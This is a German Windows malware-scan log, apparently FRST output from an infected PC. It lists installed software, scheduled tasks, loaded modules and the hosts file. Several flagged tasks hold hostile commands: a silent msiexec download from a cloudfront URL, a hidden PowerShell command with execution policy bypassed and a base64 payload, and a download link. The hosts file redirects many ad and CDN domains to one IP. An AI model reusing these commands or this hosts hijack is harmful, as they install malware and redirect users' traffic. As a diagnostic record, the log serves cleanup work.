Microsoft .NET Version Manager (x64) 1.0.0-beta5 (HKLM\...\{c5a4aba3-1aba-3ef8-b2d5-c3fa37f59738}) (Version: 1.0.10609.0 - Microsoft Corporation)
Microsoft Help Viewer 2.2 (HKLM-x32\...\Microsoft Help Viewer 2.2) (Version: 2.2.25420 - Microsoft Corporation)
Microsoft Help Viewer 2.2 Sprachpaket - DEU (HKLM-x32\...\Microsoft Help Viewer 2.2 Sprachpaket - DEU) (Version: 2.2.25420 - Microsoft Corporation)
Microsoft Office 365 - de-de (HKLM\...\O365HomePremRetail - de-de) (Version: 16.0.7766.2060 - Microsoft Corporation)
Microsoft OneDrive (HKU\S-1-5-21-2822580911-2257060262-2848143123-1000\...\OneDriveSetup.exe) (Version: 17.3.6390.0509 - Microsoft Corporation)
Microsoft Silverlight (HKLM\...\{89F4137D-6C26-4A84-BDB8-2E5A4BB71E00}) (Version: 5.1.50901.0 - Microsoft Corporation)
Microsoft SQL Server 2012 Command Line Utilities  (HKLM\...\{F09DEB00-9F41-4BC9-BA81-9F131B12B3D5}) (Version: 11.1.3000.0 - Microsoft Corporation)
Microsoft SQL Server 2012 Native Client  (HKLM\...\{8E4BA1E5-54E8-41F0-919B-CD875B83CFCE}) (Version: 11.0.2100.60 - Microsoft Corporation)
Microsoft SQL Server 2016 LocalDB  (HKLM\...\{C555970C-4C94-4A20-9869-AE7E2F84748F}) (Version: 13.0.1601.5 - Microsoft Corporation)
Microsoft SQL Server 2016 Management Objects (x64) (HKLM\...\{264B070C-82D7-4C9C-B1CE-A0B124BCC787}) (Version: 13.0.1601.5 - Microsoft Corporation)
Microsoft SQL Server 2016 T-SQL Language Service  (HKLM-x32\...\{4EFF12AE-599C-42A2-ACFA-0D95C3B11A19}) (Version: 13.0.14500.10 - Microsoft Corporation)
Microsoft SQL Server 2016 T-SQL ScriptDom  (HKLM\...\{E8F3D249-7DE6-4422-AC86-1CE7D5CCFA0F}) (Version: 13.0.1601.5 - Microsoft Corporation)
Microsoft SQL Server Compact 4.0 SP1 x64 DEU  (HKLM\...\{98225B15-ECF5-4645-B5AC-F8C5E869A5D5}) (Version: 4.0.8876.1 - Microsoft Corporation)
Microsoft SQL Server Data Tools - DEU (14.0.60519.0) (HKLM-x32\...\{9F367648-EC0C-4F97-B351-D12A51E38F96}) (Version: 14.0.60519.0 - Microsoft Corporation)
Microsoft SQL Server*2014 Management Objects  (HKLM-x32\...\{4F4CB3E2-9D2F-465A-854B-8276B02F4E7D}) (Version: 12.0.2000.8 - Microsoft Corporation)
Microsoft SQL Server*2014 Management Objects (x64) (HKLM\...\{03CB711D-679E-46ED-851B-C568418CF914}) (Version: 12.0.2000.8 - Microsoft Corporation)
Microsoft SQL Server*2014 Transact-SQL ScriptDom  (HKLM\...\{F2A2DB39-2C5A-4764-AA0F-5AB112663FFA}) (Version: 12.0.2000.8 - Microsoft Corporation)
Microsoft SQL Server*2014 T-SQL Language Service  (HKLM-x32\...\{06BE8B71-46C6-434B-869E-85C58EF3120A}) (Version: 12.0.2000.8 - Microsoft Corporation)
Microsoft SQL Server*2016 Management Objects  (HKLM-x32\...\{35A7B00B-4F9C-4B4D-919C-86FFFEE46AD6}) (Version: 13.0.1601.5 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{837b34e3-7c30-493c-8f6a-2b0f04e2912c}) (Version: 8.0.59193 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729 (HKLM\...\{14297226-E0A0-3781-8911-E9D529552663}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.17 (HKLM\...\{8220EEFE-38CD-377E-8595-13398D740ACE}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.21022 (HKLM-x32\...\{FF66E9F6-83E7-3A3E-AF14-8DE9A809A6A4}) (Version: 9.0.21022 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 (HKLM-x32\...\{9A25302D-30C0-39D9-BD6F-21E6EC160475}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2010  x64 Redistributable - 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2010  x86 Redistributable - 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.61030 (HKLM-x32\...\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}) (Version: 11.0.61030.0 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 (HKLM-x32\...\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}) (Version: 11.0.61030.0 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.21005 (HKLM-x32\...\{90ffcee5-8608-4e94-8c18-a4feb4f83fb8}) (Version: 12.0.21005.1 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 (HKLM-x32\...\{050d4fc8-5d48-4b8f-8972-47c82c46020f}) (Version: 12.0.30501.0 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.21005 (HKLM-x32\...\{4fcf070a-daac-45e9-a8b0-6850941f7ed8}) (Version: 12.0.21005.1 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.30501 (HKLM-x32\...\{f65db027-aff3-4070-886a-0d87064aabb1}) (Version: 12.0.30501.0 - Microsoft Corporation)
Microsoft Visual C++ 2015 Redistributable (x64) - 14.0.24212 (HKLM-x32\...\{323dad84-0974-4d90-a1c1-e006c7fdbb7d}) (Version: 14.0.24212.0 - Microsoft Corporation)
Microsoft Visual C++ 2015 Redistributable (x86) - 14.0.24212 (HKLM-x32\...\{462f63a8-6347-4894-a1b3-dbfe3a4c981d}) (Version: 14.0.24212.0 - Microsoft Corporation)
Microsoft Visual Studio Community 2015 mit Updates (HKLM-x32\...\{ec2556f3-08aa-4829-8017-07d7ea9e125d}) (Version: 14.0.25420.1 - Microsoft Corporation)
Microsoft Web Deploy 3.6 (HKLM\...\{94E1227C-08A9-4962-B388-1F05D89AEA75}) (Version: 3.1238.1962 - Microsoft Corporation)
Microsoft-System-CLR-Typen für SQL Server 2014 (HKLM\...\{7F6DCED8-6A2B-4436-AF20-8F659D04E388}) (Version: 12.0.2402.29 - Microsoft Corporation)
Microsoft-System-CLR-Typen für SQL Server 2014 (HKLM-x32\...\{48BF289B-F3FA-4023-9251-80ABF7B726F9}) (Version: 12.0.2402.29 - Microsoft Corporation)
Microsoft-System-CLR-Typen für SQL Server*2016 (HKLM\...\{FEC926D4-785B-4ED7-B35D-3FA37DD29F8B}) (Version: 13.0.1601.5 - Microsoft Corporation)
Microsoft-System-CLR-Typen für SQL Server*2016 (HKLM-x32\...\{A37BE9D7-EAAE-4C6B-9D7E-DBD8B8D88681}) (Version: 13.0.1601.5 - Microsoft Corporation)
Mit C# erstellte geräteübergreifende Hybrid-Apps - Vorlagen - DEU (x32 Version: 14.0.23107 - Microsoft Corporation) Hidden
MSBuild/NuGet Integration 14.0 (x86) (x32 Version: 14.0.25420 - Microsoft Corporation) Hidden
Notepad++ (HKLM-x32\...\Notepad++) (Version: 6.9.2 - Notepad++ Team)
Nox APP Player (HKLM-x32\...\Nox) (Version: 3.7.1.0 - Duodian Technology Co. Ltd.)
Office 16 Click-to-Run Extensibility Component (x32 Version: 16.0.7766.2047 - Microsoft Corporation) Hidden
Office 16 Click-to-Run Extensibility Component 64-bit Registration (Version: 16.0.7766.2047 - Microsoft Corporation) Hidden
Office 16 Click-to-Run Licensing Component (Version: 16.0.7766.2047 - Microsoft Corporation) Hidden
Office 16 Click-to-Run Localization Component (x32 Version: 16.0.7668.2066 - Microsoft Corporation) Hidden
Paket zur Festlegung von Zielversionen für Microsoft .NET Framework 4.5.1 (Deutsch) (HKLM-x32\...\{D5409B11-EF28-37A1-AE7A-6051A5BAD923}) (Version: 4.5.50932 - Microsoft Corporation)
Paket zur Festlegung von Zielversionen für Microsoft .NET Framework 4.5.1 RC für Windows Store-Apps (Deutsch) (x32 Version: 4.5.21005 - Microsoft Corporation) Hidden
Paket zur Festlegung von Zielversionen für Microsoft .NET Framework 4.5.2 (Deutsch) (HKLM-x32\...\{3F514FDC-F0F2-3B99-86D6-F7B3A2679B39}) (Version: 4.5.51209 - Microsoft Corporation)
Paket zur Festlegung von Zielversionen für Microsoft .NET Framework 4.6 (Deutsch) (HKLM-x32\...\{FACF2669-E25A-428A-9167-5EEDE741F3B9}) (Version: 4.6.00127 - Microsoft Corporation)
Paket zur Festlegung von Zielversionen für Microsoft .NET Framework 4.6.1 (Deutsch) (HKLM-x32\...\{4860C1E5-CE58-4D32-89DE-37951333B4C9}) (Version: 4.6.01055 - Microsoft Corporation)
PreEmptive Analytics Client German Language Pack (x32 Version: 1.2.5134.1 - PreEmptive Solutions) Hidden
PreEmptive Analytics Visual Studio Components (x32 Version: 1.2.5134.1 - PreEmptive Solutions) Hidden
Raptr (HKLM-x32\...\Raptr) (Version: 5.2.5-r115042-release - Raptr, Inc)
Roslyn Language Services - x86 (x32 Version: 14.0.25420 - Microsoft Corporation) Hidden
Roslyn Language Services - x86 (x32 Version: 14.0.25424 - Microsoft Corporation) Hidden
Skype™ 7.32 (HKLM-x32\...\{FC965A47-4839-40CA-B618-18F486F042C6}) (Version: 7.32.104 - Skype Technologies S.A.)
Steam (HKLM-x32\...\Steam) (Version: 2.10.91.91 - Valve Corporation)
Team Explorer for Microsoft Visual Studio 2015 Update 3 CTP1 (x32 Version: 14.98.25331 - Microsoft) Hidden
TeamSpeak 3 Client (HKLM\...\TeamSpeak 3 Client) (Version: 3.0.19 - TeamSpeak Systems GmbH)
Test Tools for Microsoft Visual Studio 2015 (x32 Version: 14.0.23107 - Microsoft Corporation) Hidden
The Binding of Isaac: Rebirth (HKLM\...\Steam App 250900) (Version:  - Nicalis, Inc.)
The Evil Within Demo (HKLM\...\Steam App 329960) (Version:  - Tango Gameworks)
TypeScript Power Tool (x32 Version: 1.8.34.0 - Microsoft Corporation) Hidden
TypeScript Tools for Microsoft Visual Studio 2015 (x32 Version: 1.8.35.0 - Microsoft Corporation) Hidden
Update for  (KB2504637) (HKLM-x32\...\{CFEF48A8-BFB8-3EAC-8BA5-DE4F8AA267CE}.KB2504637) (Version: 1 - Microsoft Corporation)
Visual Studio 2012 x64 Redistributables (HKLM\...\{8C775E70-A791-4DA8-BCC3-6AB7136F4484}) (Version: 14.0.0.1 - AVG Technologies)
Visual Studio 2012 x86 Redistributables (HKLM-x32\...\{98EFF19A-30AB-4E4B-B943-F06B1C63EBF8}) (Version: 14.0.0.1 - AVG Technologies CZ, s.r.o.)
Visual Studio 2015 Update 3 (KB3022398) (HKLM-x32\...\{7a68448b-9cf2-4049-bd73-5875f1aa7ba2}) (Version: 14.0.25420 - Microsoft Corporation)
VS Update core components (x32 Version: 14.0.25424 - Microsoft Corporation) Hidden
vs_update3notification (x32 Version: 14.0.25424 - Microsoft Corporation) Hidden
WCF Data Services 5.6.4 DEU Language Pack (x32 Version: 5.6.62175.4 - Microsoft Corporation) Hidden
WCF Data Services 5.6.4 Runtime (x32 Version: 5.6.62175.4 - Microsoft Corporation) Hidden
WCF Data Services Tools for Microsoft Visual Studio 2015 (x32 Version: 5.6.62175.4 - Microsoft Corporation) Hidden
WCF Data Services Tools for Microsoft Visual Studio 2015 DEU Language Pack (x32 Version: 5.6.62175.4 - Microsoft Corporation) Hidden
Windows Driver Package - BigNox Corporation (VBoxUSB) USB  (09/16/2015 4.3.12) (HKLM\...\76B144D15273552931249392EDB13C0BBD52C84E) (Version: 09/16/2015 4.3.12 - BigNox Corporation)
Windows Driver Package - BigNox Corporation VBoxUSBMon System  (09/16/2015 4.3.12) (HKLM\...\39F54A37125643D2E1E90FA7D81F36ACC9441510) (Version: 09/16/2015 4.3.12 - BigNox Corporation)
Windows Driver Package - BigNox Corporation XQHDrv System  (09/16/2015 4.3.12) (HKLM\...\0147813640F7AF69F569581EE672B6BE1E71798E) (Version: 09/16/2015 4.3.12 - BigNox Corporation)

==================== Benutzerdefinierte CLSID (Nicht auf der Ausnahmeliste): ==========================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)

CustomCLSID: HKU\S-1-5-21-2822580911-2257060262-2848143123-1000_Classes\CLSID\{00020420-0000-0000-C000-000000000046}\InprocServer32 -> C:\Windows\system32\oleaut32.dll (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-2822580911-2257060262-2848143123-1000_Classes\CLSID\{00020421-0000-0000-C000-000000000046}\InprocServer32 -> C:\Windows\system32\oleaut32.dll (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-2822580911-2257060262-2848143123-1000_Classes\CLSID\{00020422-0000-0000-C000-000000000046}\InprocServer32 -> C:\Windows\system32\oleaut32.dll (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-2822580911-2257060262-2848143123-1000_Classes\CLSID\{00020423-0000-0000-C000-000000000046}\InprocServer32 -> C:\Windows\system32\oleaut32.dll (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-2822580911-2257060262-2848143123-1000_Classes\CLSID\{00020424-0000-0000-C000-000000000046}\InprocServer32 -> C:\Windows\system32\oleaut32.dll (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-2822580911-2257060262-2848143123-1000_Classes\CLSID\{00020425-0000-0000-C000-000000000046}\InprocServer32 -> C:\Windows\system32\oleaut32.dll (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-2822580911-2257060262-2848143123-1000_Classes\CLSID\{162C6FB5-44D3-435B-903D-E613FA093FB5}\InprocServer32 -> C:\Users\Dominik\AppData\Local\Microsoft\OneDrive\17.3.6390.0509\amd64\FileCoAuthLib64.dll ()

==================== Geplante Aufgaben (Nicht auf der Ausnahmeliste) =============

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)

Task: {2F6283B0-71C3-4AA7-9709-4F7472913BC9} - System32\Tasks\AMD.PROCC CleanupTemporaryInternetFiles => F:\AMD Pro\AMD.PROCC.CleanupSchedulerTool.exe [2015-03-20] (AMD)
Task: {43282B88-1C88-476F-AFF6-6D1B3573E258} - System32\Tasks\hostTask => C:\ProgramData\PrefsSecure\tree.exe [2017-03-06] ()
Task: {47E9BE80-B4C5-4698-9448-1F90EB42E251} - System32\Tasks\{F98C4DCB-2D2A-4A7E-A676-7BCDC59891DA} => pcalua.exe -a C:\Users\Dominik\AppData\Roaming\Nox\bin\Nox_unload.exe
Task: {49AFA8CB-EE77-44AA-AF71-40ED84B0364E} - System32\Tasks\MiovucyN0s => C:\Program Files (x86)\qF0S2MprXG\updengine.exe  <==== ACHTUNG
Task: {5E0590DE-F480-486F-8557-464B5454B9BF} - \SystemHealer Run Delay -> Keine Datei <==== ACHTUNG
Task: {74EDCA57-F977-4976-B591-F108D62D944E} - System32\Tasks\Avira Browser Safety Updater Task => C:\Program Files (x86)\Avira\Browser Safety\AviraBrowserSafetyUpdater.exe [2015-03-11] (Avira Operations GmbH & Co. KG)
Task: {75D8BC5D-E779-4A82-9631-B041C84909DE} - \SystemHealer Monitor -> Keine Datei <==== ACHTUNG
Task: {78E6D042-ACA0-4832-8639-29000A39ABFF} - System32\Tasks\Microsoft\Office\Office Automatic Updates => C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeC2RClient.exe [2017-02-18] (Microsoft Corporation)
Task: {7AA18ECC-26BF-4EF9-A4BE-2493782C89B8} - System32\Tasks\AMD.PROCC SleepHibernate Computer => F:\AMD Pro\AMD.PROCC.Notifier.exe [2015-03-20] (AMD)
Task: {7DA4C035-B9B3-4992-8FF2-15615B290A7D} - System32\Tasks\HDWallPaper => C:\Program Files (x86)\HDWallPaper\HDWallPaper.exe  <==== ACHTUNG
Task: {83ABFFED-7A62-4709-BAA9-85ADB7BF660D} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2016-06-26] (Google Inc.)
Task: {8EA83372-A084-4C1D-AA0E-F31077E040E8} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2016-06-26] (Google Inc.)
Task: {9A5BD96E-A5A1-4B44-987C-7737AA1F4D32} - System32\Tasks\AMD.PROCC WakeUp Computer => F:\AMD Pro\AMD.PROCC.Notifier.exe [2015-03-20] (AMD)
Task: {9E87EF18-A7DE-49C0-8B64-53354AA6F47F} - System32\Tasks\Microsoft\VisualStudio\VSIX Auto Update 14 => F:\Program Files\Microsoft Visual Studio 14.0\Common7\IDE\VSIXAutoUpdate.exe [2016-06-20] (Microsoft Corporation)
Task: {A2B32D2A-9725-45E7-AC83-20CF961B0284} - System32\Tasks\PPI Update => C:\Windows\explorer.exe "hxxp://insightcdn.online/download/index.php?mn=9995" <==== ACHTUNG
Task: {A9D9E725-CAEB-40E0-8627-ACBB36602E55} - System32\Tasks\Microsoft\Office\Office Subscription Maintenance => C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonx86\Microsoft Shared\Office16\OLicenseHeartbeat.exe [2017-03-06] (Microsoft Corporation)
Task: {AD197D7D-2526-4A27-B82D-88CB9B1074FB} - System32\Tasks\AMD.PROCC CleanupCookies => F:\AMD Pro\AMD.PROCC.CleanupSchedulerTool.exe [2015-03-20] (AMD)
Task: {AF3C537C-2713-4929-8035-93806113E587} - System32\Tasks\AMD Updater => C:\Program Files\AMD\CIM\\Bin64\InstallManagerApp.exe [2016-07-18] (Advanced Micro Devices, Inc.)
Task: {B0405A52-E38A-4908-91D7-D6E9812B074B} - System32\Tasks\Ckerctyjolely Server => C:\Program Files (x86)\Voniing\xreudeph.exe 
Task: {C280FEAE-966F-461F-8873-F4FA4D2F5E9D} - System32\Tasks\{1476CE1F-B723-412A-B1E8-B7ABA1D628C5} => pcalua.exe -a "C:\Program Files (x86)\avmwlanstick\instwcli.exe" -d "C:\Program Files (x86)\avmwlanstick" -c -s SwitchStop
Task: {C7A2CA77-EFB7-40BA-8936-8F9326331B03} - System32\Tasks\Microsoft\Office\Office ClickToRun Service Monitor => C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeC2RClient.exe [2017-02-18] (Microsoft Corporation)
Task: {CB96A1D5-692A-4B8A-8102-BDA3B6086429} - System32\Tasks\Reosyavasp => "msiexec" /i hxxp://d2buh1bf1g584w.cloudfront.net/msi/rel.php?u=SanDiskXSDSSDA120G_153482402949&amp;v=201736 /q
Task: {D1BEBA76-9279-4353-8198-28E935AFF8E1} - System32\Tasks\{0A050547-0A0E-797E-0A11-087A0E0E117E} => powershell.exe -nologo -executionpolicy bypass -noninteractive -windowstyle hidden -EncodedCommand OwAgADsAIAA7ADsAOwAgADsAIAA7ACAAIAA7ACAAOwAgACAAIAAgACAAIAA7ACAAJABFAHIAcgBvAHIAQQBjAHQAaQBvAG4AUAByAGUAZgBlAHIAZQBuAGMAZQA9ACIAcwB0AG8AcAAiADsAJABzAGMAPQAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAVwBhAHIA (Der Dateneintrag hat 9988 mehr Zeichen). <==== ACHTUNG
Task: {D727D958-913E-459D-A8D7-1F8BFC41AE90} - System32\Tasks\AVGPCTuneUp_Task_BkGndMaintenance => C:\Program Files (x86)\AVG\AVG PC TuneUp\tuscanx.exe 
Task: {EFE16CEC-84C5-46FB-8FE8-DBC23BFA2B0D} - \System Healer Task -> Keine Datei <==== ACHTUNG

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird die Aufgabe verschoben. Die Datei, die durch die Aufgabe gestartet wird, wird nicht verschoben.)


==================== Verknüpfungen =============================

(Die Einträge können gelistet werden, um sie zurückzusetzen oder zu entfernen.)

ShortcutWithArgument: C:\Users\Dominik\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Internet Explorer.lnk -> C:\Program Files\Internet Explorer\iexplore.exe (Microsoft Corporation) -> %SNP%
ShortcutWithArgument: C:\Users\Dominik\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Launch Internet Explorer Browser.lnk -> C:\Program Files (x86)\Internet Explorer\iexplore.exe (Microsoft Corporation) -> %SNP%
ShortcutWithArgument: C:\Users\Dominik\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Internet Explorer.lnk -> C:\Program Files\Internet Explorer\iexplore.exe (Microsoft Corporation) -> %SNP%
ShortcutWithArgument: C:\Users\Dominik\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\ImplicitAppShortcuts\69639df789022856\Google Chrome.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) -> --profile-directory="Profile 1"
ShortcutWithArgument: C:\Users\Dominik\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\ImplicitAppShortcuts\360c22b137d62ce9\user0 - Chrome.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) -> --profile-directory=ChromeDefaultData --disable-quic

==================== Geladene Module (Nicht auf der Ausnahmeliste) ==============

2017-03-06 19:56 - 2017-03-11 15:14 - 00625272 _____ () C:\Windows\System32\NetUtils2016.dll
2017-03-06 19:54 - 2017-03-06 19:54 - 00307200 _____ () C:\Program Files (x86)\Ckerctyjolely Server\local64spl.dll
2017-03-06 19:50 - 2017-03-06 19:50 - 00959168 _____ () C:\Users\Dominik\AppData\Local\Microsoft\OneDrive\17.3.6390.0509\amd64\ClientTelemetry.dll
2015-11-13 15:01 - 2015-11-13 15:01 - 00214528 _____ () C:\Program Files\AMD\ATI.ACE\Fuel\Fuel.Container.PerformanceTuning.dll
2014-02-11 05:08 - 2014-02-11 05:08 - 00817152 _____ () C:\Program Files\AMD\ATI.ACE\Fuel\Device.dll
2014-02-11 05:08 - 2014-02-11 05:08 - 03650560 _____ () C:\Program Files\AMD\ATI.ACE\Fuel\Platform.dll
2015-11-13 15:01 - 2015-11-13 15:01 - 00127488 _____ () C:\Program Files\AMD\ATI.ACE\Fuel\Fuel.Container.Wlan.dll
2017-03-06 19:56 - 2017-03-06 20:35 - 00043520 _____ () C:\ProgramData\PrefsSecure\Nettrans.exe
2017-03-06 19:56 - 2017-03-06 19:56 - 00470592 _____ () C:\Windows\SysWOW64\NetUtils2016.exe
2010-11-22 23:56 - 2010-11-22 23:56 - 00043008 _____ () C:\Program Files (x86)\Raptr Inc\Raptr\_socket.pyd
2010-11-22 23:56 - 2010-11-22 23:56 - 00805376 _____ () C:\Program Files (x86)\Raptr Inc\Raptr\_ssl.pyd
2010-11-22 23:57 - 2010-11-22 23:57 - 00096256 _____ () C:\Program Files (x86)\Raptr Inc\Raptr\win32api.pyd
2010-11-22 23:56 - 2010-11-22 23:56 - 00110592 _____ () C:\Program Files (x86)\Raptr Inc\Raptr\pywintypes26.dll
2010-11-22 23:57 - 2010-11-22 23:57 - 00017920 _____ () C:\Program Files (x86)\Raptr Inc\Raptr\win32event.pyd
2010-11-22 23:57 - 2010-11-22 23:57 - 00036352 _____ () C:\Program Files (x86)\Raptr Inc\Raptr\win32process.pyd
2014-05-14 00:26 - 2014-05-14 00:26 - 01662464 _____ () C:\Program Files (x86)\Raptr Inc\Raptr\PyQt4.QtCore.pyd
2014-05-14 00:26 - 2014-05-14 00:26 - 00067584 _____ () C:\Program Files (x86)\Raptr Inc\Raptr\sip.pyd
2014-05-14 00:26 - 2014-05-14 00:26 - 05812736 _____ () C:\Program Files (x86)\Raptr Inc\Raptr\PyQt4.QtGui.pyd
2010-11-22 23:56 - 2010-11-22 23:56 - 00356864 _____ () C:\Program Files (x86)\Raptr Inc\Raptr\_hashlib.pyd
2010-11-22 23:56 - 2010-11-22 23:56 - 00087040 _____ () C:\Program Files (x86)\Raptr Inc\Raptr\_ctypes.pyd
2010-11-22 23:57 - 2010-11-22 23:57 - 00111104 _____ () C:\Program Files (x86)\Raptr Inc\Raptr\win32file.pyd
2010-11-22 23:56 - 2010-11-22 23:56 - 00583680 _____ () C:\Program Files (x86)\Raptr Inc\Raptr\unicodedata.pyd
2017-03-06 19:50 - 2017-03-06 19:50 - 00679624 _____ () C:\Users\Dominik\AppData\Local\Microsoft\OneDrive\17.3.6390.0509\ClientTelemetry.dll

==================== Alternate Data Streams (Nicht auf der Ausnahmeliste) =========

==================== Abgesicherter Modus (Nicht auf der Ausnahmeliste) ===================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Der Wert "AlternateShell" wird wiederhergestellt.)


==================== Verknüpfungen (Nicht auf der Ausnahmeliste) ===============

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird der Registryeintrag auf den Standardwert zurückgesetzt oder entfernt.)


==================== Internet Explorer Vertrauenswürdig/Eingeschränkt ===============

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt.)


==================== Hosts Inhalt: ===============================

(Wenn benötigt kann der Hosts: Schalter in die Fixlist aufgenommen werden um die Hosts Datei zurückzusetzen.)

2009-07-14 03:34 - 2017-03-06 19:59 - 00008602 ____A C:\Windows\system32\Drivers\etc\hosts

 127.0.0.1       down.baidu2016.com
 127.0.0.1       123.sogou.com
 127.0.0.1       www.czzsyzgm.com
 127.0.0.1       www.czzsyzxl.com
 127.0.0.1       union.baidu2019.com
 127.0.0.1       down.baidu2016.com
 127.0.0.1       123.sogou.com
 127.0.0.1       www.czzsyzgm.com
 127.0.0.1       www.czzsyzxl.com
 127.0.0.1       union.baidu2019.com
 104.131.26.227 469ba60d9681f961064c-3cca6631dac1b4997db921c060b712f6.r30.cf2.rackcdn.com
 104.131.26.227 a.bf-ad.net																
 104.131.26.227 a.visualrevenue.com														
 104.131.26.227 a1.vdna-assets.com														
 104.131.26.227 a248.e.akamai.net														
 104.131.26.227 aax.amazon-adsystem.com													
 104.131.26.227 ad.crwdcntrl.net															
 104.131.26.227 ad.mail.ru																
 104.131.26.227 ade.clmbtech.com															
 104.131.26.227 ads.adfox.ru																
 104.131.26.227 ads.pubmatic.com															
 104.131.26.227 apis.google.com															
 104.131.26.227 asset.pagefair.net														
 104.131.26.227 assets.adobedtm.com														
 104.131.26.227 assets.flocktory.com														
 104.131.26.227 autocontext.begun.ru														
 104.131.26.227 b.grvcdn.com																
 104.131.26.227 b.ns1p.net																
 104.131.26.227 b.scorecardresearch.com													
 104.131.26.227 b.wal.co																	
 104.131.26.227 babator-stg-cdn.babator.com												
 104.131.26.227 beacon.krxd.net															
 104.131.26.227 beacon.walmart.com														
 104.131.26.227 c.amazon-adsystem.com													
 104.131.26.227 c.vepxl1.net																
 104.131.26.227 c2.taboola.com															
 104.131.26.227 cdn.3lift.com															
 104.131.26.227 cdn.admixer.net															
 104.131.26.227 cdn.brcdn.com															
 104.131.26.227 cdn.cxense.com															
 104.131.26.227 cdn.interactivemedia.ne													
 104.131.26.227 cdn.krxd.net																
 104.131.26.227 cdn.lenmit.com															
 104.131.26.227 cdn.livefyre.com															
 104.131.26.227 cdn.m-pathy.com															
 104.131.26.227 cdn.mathjax.org															
 104.131.26.227 cdn.mxpnl.com															
 104.131.26.227 cdn.onthe.io																
 104.131.26.227 cdn.optimizely.com														
 104.131.26.227 cdn.prom.st																
 104.131.26.227 cdn.pushwoosh.com														
 104.131.26.227 cdn.scarabresearch.com													
 104.131.26.227 cdn.taboola.com															
 104.131.26.227 cdn.taplytics.com														
 104.131.26.227 cdn.tt.omtrdc.net														
 104.131.26.227 cdn.unid.go.com															
 104.131.26.227 cdn1.graphiq.com															
 104.131.26.227 cdn3.optimizely.com														
 104.131.26.227 cdnjs.cloudflare.com														
 104.131.26.227 cdnssl.clicktale.net														
 104.131.26.227 comet.yahoo.com															
 104.131.26.227 consent.truste.com														
 104.131.26.227 content.adriver.ru														
 104.131.26.227 contextual.media.net														
 104.131.26.227 cstatic.weborama.fr														
 104.131.26.227 d134l0cdryxgwa.cloudfront.net											
 104.131.26.227 d2oh4tlt9mrke9.cloudfront.net											
 104.131.26.227 dpm.demdex.net															
 104.131.26.227 e.monetate.net															
 104.131.26.227 edge.quantserve.com														
 104.131.26.227 edx-uk.s3ae.com															
 104.131.26.227 eu-services.babator.com													
 104.131.26.227 fc.yahoo.com																
 104.131.26.227 gaua.hit.gemius.pl														
 104.131.26.227 gde-default.hit.gemius.pl												
 104.131.26.227 go.flx1.com																
 104.131.26.227 googleadservices.com														
 104.131.26.227 hpr.outbrain.com															
 104.131.26.227 i.cricketcb.com															
 104.131.26.227 i.tfag.de																
 104.131.26.227 ib.adnxs.com																
 104.131.26.227 imagesrv.adition.com														
 104.131.26.227 img.imgsmail.ru															
 104.131.26.227 img7.auto.ria.com														
 104.131.26.227 j.ophan.co.uk															
 104.131.26.227 js-agent.newrelic.com													
 104.131.26.227 js-sec.indexww.com														
 104.131.26.227 js.revsci.net															
 104.131.26.227 js.ui-portal.de															
 104.131.26.227 kamradamnaradost.ru														
 104.131.26.227 kpmediagaua.hit.gemius.pl												
 104.131.26.227 level1cdn.com															
 104.131.26.227 mc.yandex.ru																
 104.131.26.227 ml314.com																
 104.131.26.227 mtrx.go.sonobi.com														
 104.131.26.227 ninja.onap.io															
 104.131.26.227 o.aolcdn.com																
 104.131.26.227 odb.outbrain.com															
